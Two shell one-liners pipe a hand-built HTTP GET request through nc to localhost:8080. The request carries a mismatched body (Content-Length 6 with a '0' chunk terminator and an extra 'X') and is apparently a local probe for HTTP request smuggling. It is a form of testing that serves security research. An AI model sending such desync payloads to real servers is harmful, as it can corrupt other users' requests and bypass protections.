printf "GET / HTTP/1.1\r\n"\
"Host: localhost\r\n"\
"Connection: Close\r\n"\
"User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0\r\n"\
"Content-type: application/x-www-form-urlencoded; charset=UTF-8\r\n"\
"Content-Length: 6\r\n"\
"\r\n"\
"0\r\n"\
"\r\n"\
"X" | nc localhost 8080


printf 'GET / HTTP/1.1\r\n'\
'Host: localhost\r\n'\
'Connection: Close\r\n'\
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0\r\n'\
'Content-type: application/x-www-form-urlencoded; charset=UTF-8\r\n'\
'Content-Length: 6\r\n'\
'\r\n'\
'0\r\n'\
'\r\n'\
'X' | nc localhost 8080
